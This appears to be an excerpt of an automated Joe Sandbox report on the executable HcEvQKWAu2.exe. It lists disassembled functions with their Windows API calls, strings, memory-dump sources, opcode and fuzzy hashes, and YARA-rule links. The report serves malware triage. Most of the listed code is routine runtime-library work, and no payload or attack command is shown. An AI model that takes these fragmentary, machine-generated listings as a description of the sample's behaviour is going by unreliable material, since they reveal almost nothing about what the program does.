                                          • String ID: RENAMEDLG
                                          • API String ID: 445417207-3299779563
                                          • Opcode ID: 92cf47823d65043980b3c025744bd91b094c4e2eff8e2e7d1b5e3dad6e48c502
                                          • Instruction ID: d92e6f5223e3ac721777be5c5df6e1b57744030ee4d195eee6a2427b05c71c0a
                                          • Opcode Fuzzy Hash: 92cf47823d65043980b3c025744bd91b094c4e2eff8e2e7d1b5e3dad6e48c502
                                          • Instruction Fuzzy Hash: 60016833A45218BBFA104F749D0DF57775DEB9AB11F210011F302A60D0C6A29B04BB36
                                          Function 00FA7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FA7E24,00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002), ref: 00FA7E93
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA7EA6
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FA7E24,00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002), ref: 00FA7EC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: fad4409622abf0f7613da0acd4390ef781023659999192b8307ae2fb8f9fdde2
                                          • Instruction ID: 9539ce494ff3413904426aec04debd94bbf44758efd6ae00f17b26ce65bc7386
                                          • Opcode Fuzzy Hash: fad4409622abf0f7613da0acd4390ef781023659999192b8307ae2fb8f9fdde2
                                          • Instruction Fuzzy Hash: C2F04F71A4020CFBDB15AFA5DC89B9EBFB4EF44755F0042A9F805E2260DB349E44EE90
                                          Function 00F8F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F9081B: GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                            • Part of subcall function 00F9081B: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F8F2E4
                                          • GetProcAddress.KERNEL32(00FC81C8,CryptUnprotectMemory), ref: 00F8F2F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                          • API String ID: 2141747552-1753850145
                                          • Opcode ID: f7ef9948f2d414ad3b73e99afa29632c1520817bd44705c1bbfc672805e28df3
                                          • Instruction ID: 0b16f562373bb054f841bc6700b193b92bd8433af1a72e7d8674890a94e7d356
                                          • Opcode Fuzzy Hash: f7ef9948f2d414ad3b73e99afa29632c1520817bd44705c1bbfc672805e28df3
                                          • Instruction Fuzzy Hash: D8E04F749907059EDB31AF39DC49B81BAD8AF04714B24891DE0DAA3644DAB8E540AF51
                                          Function 00FA2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AdjustPointer$_abort
                                          • String ID:
                                          • API String ID: 2252061734-0
                                          • Opcode ID: 4b2185bb596aba4a77e335cdff0fa580d0ccde4065439b7b3e966a18efef9ae2
                                          • Instruction ID: b4fb50110b7aaa6e612480244d9ea219a8fe33ecb84ac2dfbfd99a0e3d54faa7
                                          • Opcode Fuzzy Hash: 4b2185bb596aba4a77e335cdff0fa580d0ccde4065439b7b3e966a18efef9ae2
                                          • Instruction Fuzzy Hash: 9651D2F2B04212AFDB698F18D845BAA77A4FF56330F24452DE802476A2E735ED40F790
                                          Function 00FABF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 00FABF39
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FABF5C
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FABF82
                                          • _free.LIBCMT ref: 00FABF95
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FABFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 8a19c798fb1608b8a2e462038740c55ebdafe80d9c9290b49a6df9fd567e3480
                                          • Instruction ID: 9f0967969624281428679f7a043aa6f2426fc7edd31db2512926587adca67eb9
                                          • Opcode Fuzzy Hash: 8a19c798fb1608b8a2e462038740c55ebdafe80d9c9290b49a6df9fd567e3480
                                          • Instruction Fuzzy Hash: 090184F6A056167F232116FA5C8DC7B7A6DDFC3BA13180229F904C2146EF648D02B9B0
                                          Function 00FA9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,00FC1030,00000200,00FA91AD,00FA617E,?,?,?,?,00F8D984,?,?,?,00000004,00F8D710,?), ref: 00FA986E
                                          • _free.LIBCMT ref: 00FA98A3
                                          • _free.LIBCMT ref: 00FA98CA
                                          • SetLastError.KERNEL32(00000000,00FB3A34,00000050,00FC1030), ref: 00FA98D7
                                          • SetLastError.KERNEL32(00000000,00FB3A34,00000050,00FC1030), ref: 00FA98E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: ca4421c265a1bba0d571024da61cf7d9a086fcc22c604550729c9d279dc1e345
                                          • Instruction ID: 2231a342a158200a6dc6980797902666104986054d2530db0da20326ac3cce6f
                                          • Opcode Fuzzy Hash: ca4421c265a1bba0d571024da61cf7d9a086fcc22c604550729c9d279dc1e345
                                          • Instruction Fuzzy Hash: B701D1F65896096B82122335ACC9A5A37299FD37B47610234F51592292EEBC8C067661
                                          Function 00F90EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F911CF: ResetEvent.KERNEL32(?), ref: 00F911E1
                                            • Part of subcall function 00F911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F911F5
                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F90F21
                                          • CloseHandle.KERNEL32(?,?), ref: 00F90F3B
                                          • DeleteCriticalSection.KERNEL32(?), ref: 00F90F54
                                          • CloseHandle.KERNEL32(?), ref: 00F90F60
                                          • CloseHandle.KERNEL32(?), ref: 00F90F6C
                                            • Part of subcall function 00F90FE4: WaitForSingleObject.KERNEL32(?,000000FF,00F91206,?), ref: 00F90FEA
                                            • Part of subcall function 00F90FE4: GetLastError.KERNEL32(?), ref: 00F90FF6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                          • String ID:
                                          • API String ID: 1868215902-0
                                          • Opcode ID: 85a84319db7cb186ae286a6fa16d4c7223cd5ec98120d27c7c913a1d492a8290
                                          • Instruction ID: d1cd16e82fa4c36b789def137bcf8711c0e89ee5ebd2f93efd875c8781940d99
                                          • Opcode Fuzzy Hash: 85a84319db7cb186ae286a6fa16d4c7223cd5ec98120d27c7c913a1d492a8290
                                          • Instruction Fuzzy Hash: FF017571544B44EFDB22AB64DC85BC6FBA9FF08754F000929F16B52160CB757A44EF50
                                          Function 00FAC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00FAC817
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FAC829
                                          • _free.LIBCMT ref: 00FAC83B
                                          • _free.LIBCMT ref: 00FAC84D
                                          • _free.LIBCMT ref: 00FAC85F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: b786c36304bc1ea22d874f355e71ac319a1f6a4f8405598a007e6862a29e8feb
                                          • Instruction ID: 54ff2d578ce6a6cfebe115005930b8b6f6392fe54ae7eb5a56fdc456b12a83a6
                                          • Opcode Fuzzy Hash: b786c36304bc1ea22d874f355e71ac319a1f6a4f8405598a007e6862a29e8feb
                                          • Instruction Fuzzy Hash: BDF062F2A00204AB8620DB78E8C5C4673E9BF02760B551819F149D7552CBB8FC81EEA0
                                          Function 00F91FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 00F91FE5
                                          • _wcslen.LIBCMT ref: 00F91FF6
                                          • _wcslen.LIBCMT ref: 00F92006
                                          • _wcslen.LIBCMT ref: 00F92014
                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00F8B371,?,?,00000000,?,?,?), ref: 00F9202F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$CompareString
                                          • String ID:
                                          • API String ID: 3397213944-0
                                          • Opcode ID: 7f336dee067c3caa61b7a3cf06ec4c5ada180ee32f01d95c10c85b9130ae6c1a
                                          • Instruction ID: 1a65cece99dc2c3e27bebbe2cd148bcfe67488f0d2bae4aa655f94f5c5731b2f
                                          • Opcode Fuzzy Hash: 7f336dee067c3caa61b7a3cf06ec4c5ada180ee32f01d95c10c85b9130ae6c1a
                                          • Instruction Fuzzy Hash: E1F01733048018BBDF226F51EC49D8A7F26EF56760B218415FA1A6B061CB7296A5EA90
                                          Function 00FA8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00FA891E
                                            • Part of subcall function 00FA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34), ref: 00FA8DE2
                                            • Part of subcall function 00FA8DCC: GetLastError.KERNEL32(00FB3A34,?,00FAC896,00FB3A34,00000000,00FB3A34,00000000,?,00FAC8BD,00FB3A34,00000007,00FB3A34,?,00FACCBA,00FB3A34,00FB3A34), ref: 00FA8DF4
                                          • _free.LIBCMT ref: 00FA8930
                                          • _free.LIBCMT ref: 00FA8943
                                          • _free.LIBCMT ref: 00FA8954
                                          • _free.LIBCMT ref: 00FA8965
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 04bd6e964ac4c0e0a26ef0bca5d5586ffdba5b1b53cb9e6b35bff4a4775a86a8
                                          • Instruction ID: aa77a56cb51b9c123a043812b88058b03e0e710d129c8bda2d27ce3f85cf2dd4
                                          • Opcode Fuzzy Hash: 04bd6e964ac4c0e0a26ef0bca5d5586ffdba5b1b53cb9e6b35bff4a4775a86a8
                                          • Instruction Fuzzy Hash: 08F054F581015A8BD6857F24FC814853FB9F7257607010715F1155A2B1EFB54943FF81
                                          Function 00F915FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _swprintf
                                          • String ID: %ls$%s: %s
                                          • API String ID: 589789837-2259941744
                                          • Opcode ID: 6a14a9579f66d53e0ae9f494e98dccd1897529f09df81b5e035eee829dbae291
                                          • Instruction ID: 7478bd9b9e4df37553afc8ffab7cc8c14f3dc408269870fcb7efc5fa63b2a82f
                                          • Opcode Fuzzy Hash: 6a14a9579f66d53e0ae9f494e98dccd1897529f09df81b5e035eee829dbae291
                                          • Instruction Fuzzy Hash: 92511A37A88303F6FF222AE08E46F757665BB05B14F244536F786640E1D9B7A410BB1B
                                          Function 00FA7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HcEvQKWAu2.exe,00000104), ref: 00FA7FAE
                                          • _free.LIBCMT ref: 00FA8079
                                          • _free.LIBCMT ref: 00FA8083
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Users\user\Desktop\HcEvQKWAu2.exe
                                          • API String ID: 2506810119-344686266
                                          • Opcode ID: 95839b180cdc12eaf24b2a4b58ae2fd4ecb98a83e378e6ef79f707601bde21d3
                                          • Instruction ID: c05103abb0a9a44d5ae61b6b82d8722763b6780056a55b849d11f20e2990fd5b
                                          • Opcode Fuzzy Hash: 95839b180cdc12eaf24b2a4b58ae2fd4ecb98a83e378e6ef79f707601bde21d3
                                          • Instruction Fuzzy Hash: FA31A2F1A04248AFCB21EF99DC81D9EBBBCEB86350F108166F40497211DAB08E45EB51
                                          Function 00FA31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FA31FB
                                          • _abort.LIBCMT ref: 00FA3306
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: EncodePointer_abort
                                          • String ID: MOC$RCC
                                          • API String ID: 948111806-2084237596
                                          • Opcode ID: eaeb697b6a66cc9b7d1b7ca4000b889d28e2c6aa5f5e70d31c605072efcf90a6
                                          • Instruction ID: e19989ee0065045e6e4782803cfd3df552dbeae42f912d086fb86eba396fbfd1
                                          • Opcode Fuzzy Hash: eaeb697b6a66cc9b7d1b7ca4000b889d28e2c6aa5f5e70d31c605072efcf90a6
                                          • Instruction Fuzzy Hash: EE4148B1D00209AFCF15DF98CD81AEEBBB5BF4A314F198159F904A7211D739AA50EB50
                                          Function 00F87401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F87406
                                            • Part of subcall function 00F83BBA: __EH_prolog.LIBCMT ref: 00F83BBF
                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00F874CD
                                            • Part of subcall function 00F87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F87AAB
                                            • Part of subcall function 00F87A9C: GetLastError.KERNEL32 ref: 00F87AF1
                                            • Part of subcall function 00F87A9C: CloseHandle.KERNEL32(?), ref: 00F87B00
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                          • API String ID: 3813983858-639343689
                                          • Opcode ID: 618c71d4379e727fda297f7b9080eebb2c0fc4a7a330a460aa9a31d4263073d4
                                          • Instruction ID: 75d27ebad34c81263fcc8dd97f6c88a5aabdfaecf9d5d380779b9628af3d4647
                                          • Opcode Fuzzy Hash: 618c71d4379e727fda297f7b9080eebb2c0fc4a7a330a460aa9a31d4263073d4
                                          • Instruction Fuzzy Hash: CA31D471E04348AAEF11FBA4CC45FEE7BA9BF05314F144015F405AB292CB789A44EB61
                                          Function 00F9AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9AD98
                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00F9ADAD
                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F9ADC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
